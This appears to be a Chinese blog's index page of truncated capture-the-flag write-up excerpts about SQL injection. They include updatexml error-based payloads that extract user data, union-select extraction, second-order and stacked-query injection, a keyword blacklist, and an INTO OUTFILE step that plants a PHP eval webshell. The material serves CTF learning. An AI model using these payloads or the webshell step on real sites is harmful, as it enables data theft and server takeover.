fmyyy1的博客

看提示应该是sqlite注入 可以直接下载到数据库结构和源码 DROP TABLE IF EXISTS `vote`; CREATE TABLE `vote` ( `id` INTEGER PRIMARY KEY AUTOINCREMENT, `name` TEXT NOT NULL, `count` INTEGER ); INSERT INTO `vote` (`name`, `count`) VALUES ('dog', 0), ('cat', 0), ('zebra', 0).

www.tar.gz下载到源码。 结构 审计后发现有很多对数据库的操作，猜测存在注入。 文件名采取白名单对后缀名过滤，不能直接上传php文件，upload.php里面对文件名进行了addslashes转义，不存在直接注入。 commom.inc.php中对所有请求参数也进行了转义 看到rename.php <?php /** * Created by PhpStorm. * User: phithon * Date: 15/10/14 * Time: 下午9:39 */ requir

提示过滤了 union sleep 单双引号 or和benchmark。很明显的报错注入。 最后 ?search=1 and (updatexml(1,concat(0x7e,((select group_concat(uniqueid) from users)),0x7e),1)); ?search=1 and (updatexml(1,concat(0x7e,(substr((select group_concat(uniqueid) from users),32,50)),0x7e),1)); 8.

场景 注册登录 进入用户信息页面。 看到url中多了id参数，修改。 做到这已经知道是sql注入题。测试后知道这里可以异或布尔盲注和堆叠注入，但后面就注不出来了。fuzz后发现过滤了union，select之类的关键字。 参考wp，这里要用预处理写shell。 str="select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';" len_str=len(str) for i in r

点击抓包 看到对文件的请求。刚开始以为是文件读取，试了半天发现没啥用，只能转一下思路 测试后是sql注入。 order by之后是两列 在响应页面的最下面有我们注入的回显。，而且没有一点过滤，整数型注入。放最后的注入 amazonis_planitia union select 1,group_concat(id,code) from alien_code.code ...

场景 点登陆没反应，注册提示未开发，猜测sql注入。 抓包在username里添加单引号报错，闭合后提示： 参考wp是要堆叠注入，并且过滤了很多关键字，需要用十六进制和预处理语句注入。 PDO场景下的sql注入 import time import requests import json def str_to_hex(str): return ''.join(hex(ord(c)).replace('0x', '') for c in str) def binary(iterator,

场景 一开始就被卡了好久，看了wp才知道考点，真的是打死我都不会想到是信息泄露。 在github上搜索这个能拿到源码。 主要是三个php文件。 public function Get_All_Images(){ $sql = "SELECT * FROM images"; $result = mysqli_query($this->con, $sql); if ($result->num_rows > 0){ while($row = $result->

场景 既然有login.php那就会有register.php，访问。 注册一个账号进去。 登录进去后看到我们的用户名了。 猜测在用户名处存在二次注入，再注册一个账号。 用户名变成了0，证明存在二次注入。 fuzz之后发现逗号，information等许多关键字被过滤了。 绕过方法： mysql中，+只能当做运算符。 执行select '1'+'1a'时 结果 执行select '0'+database(); 编程了0，但我们可以用ascii编码进行计算。 select '0'+ascii(

学到了新的sql注入知识。 场景 看到了查询语句。 访问robots.txt 看到有hint 看到了黑名单。 $black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|slee

查询界面，猜测sql注入，查询抓包 fuzz后发现information_schema,or，union等关键字被过滤了，应该是要无列名注入。 用^代替or id=0^(length(database())>1) 证明存在sql注入 InnoDb引擎 从MYSQL5.5.8开始，InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中，inndb增加了innodb_index_stats和innodb_table_stats两张表，这两张表中都存储了数据库和其数据表的信息，但是没有存储列.

打开题目是一个留言板界面，猜测存在二次注入。 发帖需要登录，提示用户名为zhangwei，密码为zhangwei***，后三位需要爆破，结果为zhangwei666 登录成功后，在控制台可以看到提示，存在git泄露。 源码显示不完全，需要回溯一下。 完整源码： <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); d.

有登录界面和注册界面，先注册。 注册后登录 有修改密码的界面。 报错了，确认存在二次注入。 payload username=fmyyy2"||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1))# username=fmyyy"||(updatexml(1,concat(0x7e,(sele.

题目场景 猜测是sql注入，读源码 发现底部有提示，尝试用伪协议读源码。 读到了index.php，delete.php，search.php，change.php，config.php，confirm.php。 精简后的源码如下： index.php <?php ini_set('open_basedir', '/var/www/html/'); // $file = $_GET["file"]; $file = (isset($_GET['file']) ? $_GET['file'] :